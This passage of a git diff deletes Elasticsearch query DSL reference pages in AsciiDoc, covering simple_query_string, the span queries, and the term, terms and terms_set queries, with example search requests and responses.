independently before returning matching -documents. - -While its syntax is more limited than the -<>, the `simple_query_string` -query does not return errors for invalid syntax. Instead, it ignores any invalid -parts of the query string. - -[[simple-query-string-query-ex-request]] -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string" : { - "query": "\"fried eggs\" +(eggplant | potato) -frittata", - "fields": ["title^5", "body"], - "default_operator": "and" - } - } -} --------------------------------------------------- - - -[[simple-query-string-top-level-params]] -==== Top-level parameters for `simple_query_string` - -`query`:: -(Required, string) Query string you wish to parse and use for search. See <>. - -`fields`:: -+ --- -(Optional, array of strings) Array of fields you wish to search. - -This field accepts wildcard expressions. You also can boost relevance scores for -matches to particular fields using a caret (`^`) notation. See -<> for examples. - -Defaults to the `index.query.default_field` index setting, which has a default -value of `*`. The `*` value extracts all fields that are eligible to term -queries and filters the metadata fields. All extracted fields are then combined -to build a query if no `prefix` is specified. - -WARNING: There is a limit on the number of fields that can be queried at once. -It is defined by the `indices.query.bool.max_clause_count` -<>, which defaults to `1024`. --- - -`default_operator`:: -+ --- -(Optional, string) Default boolean logic used to interpret text in the query -string if no operators are specified. Valid values are: - -`OR` (Default):: -For example, a query string of `capital of Hungary` is interpreted as `capital -OR of OR Hungary`. - -`AND`:: -For example, a query string of `capital of Hungary` is interpreted as `capital -AND of AND Hungary`. --- - -`all_fields`:: -deprecated:[6.0.0, set `fields` to `*` instead](Optional, boolean) If `true`, -search all searchable fields in the index's field mapping. - -`analyze_wildcard`:: -(Optional, Boolean) If `true`, the query attempts to analyze wildcard terms in -the query string. Defaults to `false`. - -`analyzer`:: -(Optional, string) <> used to convert text in the -query string into tokens. Defaults to the -<> mapped for the -`default_field`. If no analyzer is mapped, the index's default analyzer is used. - -`auto_generate_synonyms_phrase_query`:: -(Optional, Boolean) If `true`, <> -queries are automatically created for multi-term synonyms. Defaults to `true`. -See <> for an example. - -`flags`:: -(Optional, string) List of enabled operators for the -<>. Defaults to `ALL` -(all operators). See <> for valid values. - -`fuzzy_max_expansions`:: -(Optional, integer) Maximum number of terms to which the query expands for fuzzy -matching. Defaults to `50`. - -`fuzzy_prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged for fuzzy -matching. Defaults to `0`. - -`fuzzy_transpositions`:: -(Optional, Boolean) If `true`, edits for fuzzy matching include -transpositions of two adjacent characters (ab → ba). Defaults to `true`. - -`lenient`:: -(Optional, Boolean) If `true`, format-based errors, such as providing a text -value for a <> field, are ignored. Defaults to `false`. - -`minimum_should_match`:: -(Optional, string) Minimum number of clauses that must match for a document to -be returned. See the <> for valid values and more information. - -`quote_field_suffix`:: -+ --- -(Optional, string) Suffix appended to quoted text in the query string. - -You can use this suffix to use a different analysis method for exact matches. -See <>. --- - - -[[simple-query-string-query-notes]] -==== Notes - -[[simple-query-string-syntax]] -===== Simple query string syntax -The `simple_query_string` query supports the following operators: - -* `+` signifies AND operation -* `|` signifies OR operation -* `-` negates a single token -* `"` wraps a number of tokens to signify a phrase for searching -* `*` at the end of a term signifies a prefix query -* `(` and `)` signify precedence -* `~N` after a word signifies edit distance (fuzziness) -* `~N` after a phrase signifies slop amount - -To use one of these characters literally, escape it with a preceding backslash -(`\`). - -The behavior of these operators may differ depending on the `default_operator` -value. For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string": { - "fields": [ "content" ], - "query": "foo bar -baz" - } - } -} --------------------------------------------------- - -This search is intended to only return documents containing `foo` or `bar` that -also do **not** contain `baz`. However because of a `default_operator` of `OR`, -this search actually returns documents that contain `foo` or `bar` and any -documents that don't contain `baz`. To return documents as intended, change the -query string to `foo bar +-baz`. - -[[supported-flags]] -===== Limit operators -You can use the `flags` parameter to limit the supported operators for the -simple query string syntax. - -To explicitly enable only specific operators, use a `|` separator. For example, -a `flags` value of `OR|AND|PREFIX` disables all operators except `OR`, `AND`, -and `PREFIX`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string": { - "query": "foo | bar + baz*", - "flags": "OR|AND|PREFIX" - } - } -} --------------------------------------------------- - -[[supported-flags-values]] -====== Valid values -The available flags are: - -`ALL` (Default):: -Enables all optional operators. - -`AND`:: -Enables the `+` AND operator. - -`ESCAPE`:: -Enables `\` as an escape character. - -`FUZZY`:: -Enables the `~N` operator after a word, where `N` is an integer denoting the -allowed edit distance for matching. See <>. - -`NEAR`:: -Enables the `~N` operator, after a phrase where `N` is the maximum number of -positions allowed between matching tokens. Synonymous to `SLOP`. - -`NONE`:: -Disables all operators. - -`NOT`:: -Enables the `-` NOT operator. - -`OR`:: -Enables the `\|` OR operator. - -`PHRASE`:: -Enables the `"` quotes operator used to search for phrases. - -`PRECEDENCE`:: -Enables the `(` and `)` operators to control operator precedence. - -`PREFIX`:: -Enables the `*` prefix operator. - -`SLOP`:: -Enables the `~N` operator, after a phrase where `N` is maximum number of -positions allowed between matching tokens. Synonymous to `NEAR`. - -`WHITESPACE`:: -Enables whitespace as split characters. - -[[simple-query-string-boost]] -===== Wildcards and per-field boosts in the `fields` parameter - -Fields can be specified with wildcards, eg: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string" : { - "query": "Will Smith", - "fields": [ "title", "*_name" ] <1> - } - } -} --------------------------------------------------- - -<1> Query the `title`, `first_name` and `last_name` fields. - -Individual fields can be boosted with the caret (`^`) notation: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string" : { - "query" : "this is a test", - "fields" : [ "subject^3", "message" ] <1> - } - } -} --------------------------------------------------- - -<1> The `subject` field is three times as important as the `message` field. - -[[simple-query-string-synonyms]] -===== Synonyms - -The `simple_query_string` query supports multi-terms synonym expansion with the <> token filter. When this filter is used, the parser creates a phrase query for each multi-terms synonyms. -For example, the following synonym: `"ny, new york"` would produce: - -`(ny OR ("new york"))` - -It is also possible to match multi terms synonyms with conjunctions instead: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "simple_query_string" : { - "query" : "ny city", - "auto_generate_synonyms_phrase_query" : false - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(ny OR (new AND york)) city)` - -that matches documents with the term `ny` or the conjunction `new AND york`. -By default the parameter `auto_generate_synonyms_phrase_query` is set to `true`. - diff --git a/docs/reference/query-dsl/span-containing-query.asciidoc b/docs/reference/query-dsl/span-containing-query.asciidoc deleted file mode 100644 index ec1c0bdf0a8..00000000000 --- a/docs/reference/query-dsl/span-containing-query.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[query-dsl-span-containing-query]] -=== Span containing query -++++ -Span containing -++++ - -Returns matches which enclose another span query. The span containing -query maps to Lucene `SpanContainingQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_containing": { - "little": { - "span_term": { "field1": "foo" } - }, - "big": { - "span_near": { - "clauses": [ - { "span_term": { "field1": "bar" } }, - { "span_term": { "field1": "baz" } } - ], - "slop": 5, - "in_order": true - } - } - } - } -} --------------------------------------------------- - -The `big` and `little` clauses can be any span type query. Matching -spans from `big` that contain matches from `little` are returned. diff --git a/docs/reference/query-dsl/span-field-masking-query.asciidoc b/docs/reference/query-dsl/span-field-masking-query.asciidoc deleted file mode 100644 index a101c8afc47..00000000000 --- a/docs/reference/query-dsl/span-field-masking-query.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ -[[query-dsl-span-field-masking-query]] -=== Span field masking query -++++ -Span field masking -++++ - -Wrapper to allow span queries to participate in composite single-field span queries by 'lying' about their search field. The span field masking query maps to Lucene's `SpanFieldMaskingQuery` - -This can be used to support queries like `span-near` or `span-or` across different fields, which is not ordinarily permitted. - -Span field masking query is invaluable in conjunction with *multi-fields* when same content is indexed with multiple analyzers. For instance we could index a field with the standard analyzer which breaks text up into words, and again with the english analyzer which stems words into their root form. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_near": { - "clauses": [ - { - "span_term": { - "text": "quick brown" - } - }, - { - "field_masking_span": { - "query": { - "span_term": { - "text.stems": "fox" - } - }, - "field": "text" - } - } - ], - "slop": 5, - "in_order": false - } - } -} --------------------------------------------------- - -Note: as span field masking query returns the masked field, scoring will be done using the norms of the field name supplied. This may lead to unexpected scoring behaviour. \ No newline at end of file diff --git a/docs/reference/query-dsl/span-first-query.asciidoc b/docs/reference/query-dsl/span-first-query.asciidoc deleted file mode 100644 index 77e3f557fd9..00000000000 --- a/docs/reference/query-dsl/span-first-query.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[query-dsl-span-first-query]] -=== Span first query -++++ -Span first -++++ - -Matches spans near the beginning of a field. The span first query maps -to Lucene `SpanFirstQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_first": { - "match": { - "span_term": { "user.id": "kimchy" } - }, - "end": 3 - } - } -} --------------------------------------------------- - -The `match` clause can be any other span type query. The `end` controls -the maximum end position permitted in a match. diff --git a/docs/reference/query-dsl/span-multi-term-query.asciidoc b/docs/reference/query-dsl/span-multi-term-query.asciidoc deleted file mode 100644 index 8a78c2ba197..00000000000 --- a/docs/reference/query-dsl/span-multi-term-query.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[query-dsl-span-multi-term-query]] -=== Span multi-term query -++++ -Span multi-term -++++ - -The `span_multi` query allows you to wrap a `multi term query` (one of wildcard, -fuzzy, prefix, range or regexp query) as a `span query`, so -it can be nested. Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_multi": { - "match": { - "prefix": { "user.id": { "value": "ki" } } - } - } - } -} --------------------------------------------------- - -A boost can also be associated with the query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_multi": { - "match": { - "prefix": { "user.id": { "value": "ki", "boost": 1.08 } } - } - } - } -} --------------------------------------------------- - -WARNING: `span_multi` queries will hit too many clauses failure if the number of terms that match the query exceeds the -boolean query limit (defaults to 1024).To avoid an unbounded expansion you can set the <> of the multi term query to `top_terms_*` rewrite. Or, if you use `span_multi` on `prefix` query only, -you can activate the <> field option of the `text` field instead. This will -rewrite any prefix query on the field to a single term query that matches the indexed prefix. - diff --git a/docs/reference/query-dsl/span-near-query.asciidoc b/docs/reference/query-dsl/span-near-query.asciidoc deleted file mode 100644 index 0a1aa7082fb..00000000000 --- a/docs/reference/query-dsl/span-near-query.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[query-dsl-span-near-query]] -=== Span near query -++++ -Span near -++++ - -Matches spans which are near one another. One can specify _slop_, the -maximum number of intervening unmatched positions, as well as whether -matches are required to be in-order. The span near query maps to Lucene -`SpanNearQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_near": { - "clauses": [ - { "span_term": { "field": "value1" } }, - { "span_term": { "field": "value2" } }, - { "span_term": { "field": "value3" } } - ], - "slop": 12, - "in_order": false - } - } -} --------------------------------------------------- - -The `clauses` element is a list of one or more other span type queries -and the `slop` controls the maximum number of intervening unmatched -positions permitted. diff --git a/docs/reference/query-dsl/span-not-query.asciidoc b/docs/reference/query-dsl/span-not-query.asciidoc deleted file mode 100644 index 99814eba9d8..00000000000 --- a/docs/reference/query-dsl/span-not-query.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -[[query-dsl-span-not-query]] -=== Span not query -++++ -Span not -++++ - -Removes matches which overlap with another span query or which are -within x tokens before (controlled by the parameter `pre`) or y tokens -after (controlled by the parameter `post`) another SpanQuery. The span not -query maps to Lucene `SpanNotQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_not": { - "include": { - "span_term": { "field1": "hoya" } - }, - "exclude": { - "span_near": { - "clauses": [ - { "span_term": { "field1": "la" } }, - { "span_term": { "field1": "hoya" } } - ], - "slop": 0, - "in_order": true - } - } - } - } -} --------------------------------------------------- - -The `include` and `exclude` clauses can be any span type query. The -`include` clause is the span query whose matches are filtered, and the -`exclude` clause is the span query whose matches must not overlap those -returned. - -In the above example all documents with the term hoya are filtered except the ones that have 'la' preceding them. - -Other top level options: - -[horizontal] -`pre`:: If set the amount of tokens before the include span can't have overlap with the exclude span. Defaults to 0. -`post`:: If set the amount of tokens after the include span can't have overlap with the exclude span. Defaults to 0. -`dist`:: If set the amount of tokens from within the include span can't have overlap with the exclude span. Equivalent - of setting both `pre` and `post`. diff --git a/docs/reference/query-dsl/span-or-query.asciidoc b/docs/reference/query-dsl/span-or-query.asciidoc deleted file mode 100644 index 6c0e78ab266..00000000000 --- a/docs/reference/query-dsl/span-or-query.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[query-dsl-span-or-query]] -=== Span or query -++++ -Span or -++++ - -Matches the union of its span clauses. The span or query maps to Lucene -`SpanOrQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_or" : { - "clauses" : [ - { "span_term" : { "field" : "value1" } }, - { "span_term" : { "field" : "value2" } }, - { "span_term" : { "field" : "value3" } } - ] - } - } -} --------------------------------------------------- - -The `clauses` element is a list of one or more other span type queries. diff --git a/docs/reference/query-dsl/span-queries.asciidoc b/docs/reference/query-dsl/span-queries.asciidoc deleted file mode 100644 index cc14b0ee493..00000000000 --- a/docs/reference/query-dsl/span-queries.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[span-queries]] -== Span queries - -Span queries are low-level positional queries which provide expert control -over the order and proximity of the specified terms. These are typically used -to implement very specific queries on legal documents or patents. - -It is only allowed to set boost on an outer span query. Compound span queries, -like span_near, only use the list of matching spans of inner span queries in -order to find their own spans, which they then use to produce a score. Scores -are never computed on inner span queries, which is the reason why boosts are not -allowed: they only influence the way scores are computed, not spans. - -Span queries cannot be mixed with non-span queries (with the exception of the `span_multi` query). - -The queries in this group are: - -<>:: -Accepts a list of span queries, but only returns those spans which also match a second span query. - -<>:: -Allows queries like `span-near` or `span-or` across different fields. - -<>:: -Accepts another span query whose matches must appear within the first N -positions of the field. - -<>:: -Wraps a <>, <>, -<>, <>, -<>, or <> query. - -<>:: -Accepts multiple span queries whose matches must be within the specified distance of each other, and possibly in the same order. - -<>:: -Wraps another span query, and excludes any documents which match that query. - -<>:: -Combines multiple span queries -- returns documents which match any of the -specified queries. - -<>:: - -The equivalent of the <> but for use with -other span queries. - -<>:: -The result from a single span query is returned as long is its span falls -within the spans returned by a list of other span queries. - - -include::span-containing-query.asciidoc[] - -include::span-field-masking-query.asciidoc[] - -include::span-first-query.asciidoc[] - -include::span-multi-term-query.asciidoc[] - -include::span-near-query.asciidoc[] - -include::span-not-query.asciidoc[] - -include::span-or-query.asciidoc[] - -include::span-term-query.asciidoc[] - -include::span-within-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/span-term-query.asciidoc b/docs/reference/query-dsl/span-term-query.asciidoc deleted file mode 100644 index 0dac73c9f70..00000000000 --- a/docs/reference/query-dsl/span-term-query.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[query-dsl-span-term-query]] -=== Span term query -++++ -Span term -++++ - -Matches spans containing a term. The span term query maps to Lucene -`SpanTermQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_term" : { "user.id" : "kimchy" } - } -} --------------------------------------------------- - -A boost can also be associated with the query: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_term" : { "user.id" : { "value" : "kimchy", "boost" : 2.0 } } - } -} --------------------------------------------------- - -Or : - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_term" : { "user.id" : { "term" : "kimchy", "boost" : 2.0 } } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/span-within-query.asciidoc b/docs/reference/query-dsl/span-within-query.asciidoc deleted file mode 100644 index 62a12fc7196..00000000000 --- a/docs/reference/query-dsl/span-within-query.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[query-dsl-span-within-query]] -=== Span within query -++++ -Span within -++++ - -Returns matches which are enclosed inside another span query. The span within -query maps to Lucene `SpanWithinQuery`. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "span_within": { - "little": { - "span_term": { "field1": "foo" } - }, - "big": { - "span_near": { - "clauses": [ - { "span_term": { "field1": "bar" } }, - { "span_term": { "field1": "baz" } } - ], - "slop": 5, - "in_order": true - } - } - } - } -} --------------------------------------------------- - -The `big` and `little` clauses can be any span type query. Matching -spans from `little` that are enclosed within `big` are returned. diff --git a/docs/reference/query-dsl/special-queries.asciidoc b/docs/reference/query-dsl/special-queries.asciidoc deleted file mode 100644 index 06f7cc98a73..00000000000 --- a/docs/reference/query-dsl/special-queries.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[specialized-queries]] - -== Specialized queries - -This group contains queries which do not fit into the other groups: - -<>:: -A query that computes scores based on the dynamically computed distances -between the origin and documents' date, date_nanos and geo_point fields. -It is able to efficiently skip non-competitive hits. - -<>:: -This query finds documents which are similar to the specified text, document, -or collection of documents. - -<>:: -This query finds queries that are stored as documents that match with -the specified document. - -<>:: -A query that computes scores based on the values of numeric features and is -able to efficiently skip non-competitive hits. - -<>:: -This query allows a script to act as a filter. Also see the -<>. - -<>:: -A query that allows to modify the score of a sub-query with a script. - -<>:: -A query that accepts other queries as json or yaml string. - -<>:: -A query that promotes selected documents over others matching a given query. - -include::distance-feature-query.asciidoc[] - -include::mlt-query.asciidoc[] - -include::percolate-query.asciidoc[] - -include::rank-feature-query.asciidoc[] - -include::script-query.asciidoc[] - -include::script-score-query.asciidoc[] - -include::wrapper-query.asciidoc[] - -include::pinned-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/term-level-queries.asciidoc b/docs/reference/query-dsl/term-level-queries.asciidoc deleted file mode 100644 index 9ddc4e9d63f..00000000000 --- a/docs/reference/query-dsl/term-level-queries.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[term-level-queries]] -== Term-level queries - -You can use **term-level queries** to find documents based on precise values in -structured data. Examples of structured data include date ranges, IP addresses, -prices, or product IDs. - -Unlike <>, term-level queries do not -analyze search terms. Instead, term-level queries match the exact terms stored -in a field. - - -[NOTE] -==== -Term-level queries still normalize search terms for `keyword` fields with the -`normalizer` property. For more details, see <>. -==== - -[discrete] -[[term-level-query-types]] -=== Types of term-level queries - -<>:: -Returns documents that contain any indexed value for a field. - -<>:: -Returns documents that contain terms similar to the search term. {es} measures -similarity, or fuzziness, using a -{wikipedia}/Levenshtein_distance[Levenshtein edit distance]. - -<>:: -Returns documents based on their <>. - -<>:: -Returns documents that contain a specific prefix in a provided field. - -<>:: -Returns documents that contain terms within a provided range. - -<>:: -Returns documents that contain terms matching a -{wikipedia}/Regular_expression[regular expression]. - -<>:: -Returns documents that contain an exact term in a provided field. - -<>:: -Returns documents that contain one or more exact terms in a provided field. - -<>:: -Returns documents that contain a minimum number of exact terms in a provided -field. You can define the minimum number of matching terms using a field or -script. - -<>:: -Returns documents of the specified type. - -<>:: -Returns documents that contain terms matching a wildcard pattern. - - -include::exists-query.asciidoc[] - -include::fuzzy-query.asciidoc[] - -include::ids-query.asciidoc[] - -include::prefix-query.asciidoc[] - -include::range-query.asciidoc[] - -include::regexp-query.asciidoc[] - -include::term-query.asciidoc[] - -include::terms-query.asciidoc[] - -include::terms-set-query.asciidoc[] - -include::type-query.asciidoc[] - -include::wildcard-query.asciidoc[] diff --git a/docs/reference/query-dsl/term-query.asciidoc b/docs/reference/query-dsl/term-query.asciidoc deleted file mode 100644 index 17ad147da3e..00000000000 --- a/docs/reference/query-dsl/term-query.asciidoc +++ /dev/null @@ -1,222 +0,0 @@ -[[query-dsl-term-query]] -=== Term query -++++ -Term -++++ - -Returns documents that contain an *exact* term in a provided field. - -You can use the `term` query to find documents based on a precise value such as -a price, a product ID, or a username. - -[WARNING] -==== -Avoid using the `term` query for <> fields. - -By default, {es} changes the values of `text` fields as part of <>. This can make finding exact matches for `text` field values -difficult. - -To search `text` field values, use the <> query -instead. -==== - -[[term-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "term": { - "user.id": { - "value": "kimchy", - "boost": 1.0 - } - } - } -} ----- - -[[term-top-level-params]] -==== Top-level parameters for `term` -``:: -(Required, object) Field you wish to search. - -[[term-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Term you wish to find in the provided ``. To return a -document, the term must exactly match the field value, including whitespace and -capitalization. - -`boost`:: -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. -+ -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. -+ -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. - -`case_insensitive`:: -(Optional, Boolean) allows ASCII case insensitive matching of the -value with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping - -[[term-query-notes]] -==== Notes - -[[avoid-term-query-text-fields]] -===== Avoid using the `term` query for `text` fields -By default, {es} changes the values of `text` fields during analysis. For -example, the default <> changes -`text` field values as follows: - -* Removes most punctuation -* Divides the remaining content into individual words, called -<> -* Lowercases the tokens - -To better search `text` fields, the `match` query also analyzes your provided -search term before performing a search. This means the `match` query can search -`text` fields for analyzed tokens rather than an exact term. - -The `term` query does *not* analyze the search term. The `term` query only -searches for the *exact* term you provide. This means the `term` query may -return poor or no results when searching `text` fields. - -To see the difference in search results, try the following example. - -. Create an index with a `text` field called `full_text`. -+ --- - -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_text": { "type": "text" } - } - } -} ----- - --- - -. Index a document with a value of `Quick Brown Foxes!` in the `full_text` -field. -+ --- - -[source,console] ----- -PUT my-index-000001/_doc/1 -{ - "full_text": "Quick Brown Foxes!" -} ----- -// TEST[continued] - -Because `full_text` is a `text` field, {es} changes `Quick Brown Foxes!` to -`[quick, brown, fox]` during analysis. - --- - -. Use the `term` query to search for `Quick Brown Foxes!` in the `full_text` -field. Include the `pretty` parameter so the response is more readable. -+ --- - -[source,console] ----- -GET my-index-000001/_search?pretty -{ - "query": { - "term": { - "full_text": "Quick Brown Foxes!" - } - } -} ----- -// TEST[continued] - -Because the `full_text` field no longer contains the *exact* term `Quick Brown -Foxes!`, the `term` query search returns no results. - --- - -. Use the `match` query to search for `Quick Brown Foxes!` in the `full_text` -field. -+ --- - -//// - -[source,console] ----- -POST my-index-000001/_refresh ----- -// TEST[continued] - -//// - -[source,console] ----- -GET my-index-000001/_search?pretty -{ - "query": { - "match": { - "full_text": "Quick Brown Foxes!" - } - } -} ----- -// TEST[continued] - -Unlike the `term` query, the `match` query analyzes your provided search term, -`Quick Brown Foxes!`, before performing a search. The `match` query then returns -any documents containing the `quick`, `brown`, or `fox` tokens in the -`full_text` field. - -Here's the response for the `match` query search containing the indexed document -in the results. - -[source,console-result] ----- -{ - "took" : 1, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 0.8630463, - "hits" : [ - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_score" : 0.8630463, - "_source" : { - "full_text" : "Quick Brown Foxes!" - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 1/"took" : $body.took/] --- diff --git a/docs/reference/query-dsl/terms-query.asciidoc b/docs/reference/query-dsl/terms-query.asciidoc deleted file mode 100644 index a39fa5c0b0f..00000000000 --- a/docs/reference/query-dsl/terms-query.asciidoc +++ /dev/null @@ -1,249 +0,0 @@ -[[query-dsl-terms-query]] -=== Terms query -++++ -Terms -++++ - -Returns documents that contain one or more *exact* terms in a provided field. - -The `terms` query is the same as the <>, -except you can search for multiple values. - -[[terms-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains `kimchy` -or `elkbee`. - -[source,console] ----- -GET /_search -{ - "query": { - "terms": { - "user.id": [ "kimchy", "elkbee" ], - "boost": 1.0 - } - } -} ----- - -[[terms-top-level-params]] -==== Top-level parameters for `terms` -``:: -+ --- -(Optional, object) Field you wish to search. - -The value of this parameter is an array of terms you wish to find in the -provided field. To return a document, one or more terms must exactly match a -field value, including whitespace and capitalization. - -By default, {es} limits the `terms` query to a maximum of 65,536 -terms. You can change this limit using the <> setting. - -[NOTE] -To use the field values of an existing document as search terms, use the -<> parameters. --- - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. - -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -[[terms-query-notes]] -==== Notes - -[[query-dsl-terms-query-highlighting]] -===== Highlighting `terms` queries -<> is best-effort only. {es} may not -return highlight results for `terms` queries depending on: - -* Highlighter type -* Number of terms in the query - -[[query-dsl-terms-lookup]] -===== Terms lookup -Terms lookup fetches the field values of an existing document. {es} then uses -those values as search terms. This can be helpful when searching for a large set -of terms. - -Because terms lookup fetches values from a document, the <> mapping field must be enabled to use terms lookup. The `_source` -field is enabled by default. - -[NOTE] -By default, {es} limits the `terms` query to a maximum of 65,536 -terms. This includes terms fetched using terms lookup. You can change -this limit using the <> setting. - -To perform a terms lookup, use the following parameters. - -[[query-dsl-terms-lookup-params]] -====== Terms lookup parameters -`index`:: -(Required, string) Name of the index from which to fetch field values. - -`id`:: -(Required, string) <> of the document from which to fetch -field values. - -`path`:: -+ --- -(Required, string) Name of the field from which to fetch field values. {es} uses -these values as search terms for the query. - -If the field values include an array of nested inner objects, you can access -those objects using dot notation syntax. --- - -`routing`:: -(Optional, string) Custom <> of the -document from which to fetch term values. If a custom routing value was provided -when the document was indexed, this parameter is required. - -[[query-dsl-terms-lookup-example]] -====== Terms lookup example - -To see how terms lookup works, try the following example. - -. Create an index with a `keyword` field named `color`. -+ --- - -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "color": { "type": "keyword" } - } - } -} ----- --- - -. Index a document with an ID of 1 and values of `["blue", "green"]` in the -`color` field. -+ --- - -[source,console] ----- -PUT my-index-000001/_doc/1 -{ - "color": ["blue", "green"] -} ----- -// TEST[continued] --- - -. Index another document with an ID of 2 and value of `blue` in the `color` -field. -+ --- - -[source,console] ----- -PUT my-index-000001/_doc/2 -{ - "color": "blue" -} ----- -// TEST[continued] --- - -. Use the `terms` query with terms lookup parameters to find documents -containing one or more of the same terms as document 2. Include the `pretty` -parameter so the response is more readable. -+ --- - -//// - -[source,console] ----- -POST my-index-000001/_refresh ----- -// TEST[continued] - -//// - -[source,console] ----- -GET my-index-000001/_search?pretty -{ - "query": { - "terms": { - "color" : { - "index" : "my-index-000001", - "id" : "2", - "path" : "color" - } - } - } -} ----- -// TEST[continued] - -Because document 2 and document 1 both contain `blue` as a value in the `color` -field, {es} returns both documents. - -[source,console-result] ----- -{ - "took" : 17, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 2, - "relation" : "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "color" : [ - "blue", - "green" - ] - } - }, - { - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "2", - "_score" : 1.0, - "_source" : { - "color" : "blue" - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 17/"took" : $body.took/] --- diff --git a/docs/reference/query-dsl/terms-set-query.asciidoc b/docs/reference/query-dsl/terms-set-query.asciidoc deleted file mode 100644 index 2abfe54d539..00000000000 --- a/docs/reference/query-dsl/terms-set-query.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[query-dsl-terms-set-query]] -=== Terms set query -++++ -Terms set -++++ - -Returns documents that contain a minimum number of *exact* terms in a provided -field. - -The `terms_set` query is the same as the <>, except you can define the number of matching terms required to -return a document. For example: - -* A field, `programming_languages`, contains a list of known programming -languages, such as `c++`, `java`, or `php` for job candidates. You can use the -`terms_set` query to return documents that match at least two of these -languages. - -* A field, `permissions`, contains a list of possible user permissions for an -application. You can use the `terms_set` query to return documents that -match a subset of these permissions. - -[[terms-set-query-ex-request]] -==== Example request - -[[terms-set-query-ex-request-index-setup]] -===== Index setup -In most cases, you'll need to include a <> field mapping in -your index to use the `terms_set` query. This numeric field contains the -number of matching terms required to return a document. - -To see how you can set up an index for the `terms_set` query, try the -following example. - -. Create an index, `job-candidates`, with the following field mappings: -+ --- - -* `name`, a <> field. This field contains the name of the -job candidate. - -* `programming_languages`, a <> field. This field contains -programming languages known by the job candidate. - -* `required_matches`, a <> `long` field. This field contains -the number of matching terms required to return a document. - -[source,console] ----- -PUT /job-candidates -{ - "mappings": { - "properties": { - "name": { - "type": "keyword" - }, - "programming_languages": { - "type": "keyword" - }, - "required_matches": { - "type": "long" - } - } - } -} ----- -// TESTSETUP - --- - -. Index a document with an ID of `1` and the following values: -+ --- - -* `Jane Smith` in the `name` field. - -* `["c++", "java"]` in the `programming_languages` field. - -* `2` in the `required_matches` field. - -Include the `?refresh` parameter so the document is immediately available for -search. - -[source,console] ----- -PUT /job-candidates/_doc/1?refresh -{ - "name": "Jane Smith", - "programming_languages": [ "c++", "java" ], - "required_matches": 2 -} ----- - --- - -. Index another document with an ID of `2` and the following values: -+ --- - -* `Jason Response` in the `name` field. - -* `["java", "php"]` in the `programming_languages` field. - -* `2` in the `required_matches` field. - -[source,console] ----- -PUT /job-candidates/_doc/2?refresh -{ - "name": "Jason Response", - "programming_languages": [ "java", "php" ], - "required_matches": 2 -} ----- - --- - -You can now use the `required_matches` field value as the number of -matching terms required to return a document in the `terms_set` query. - 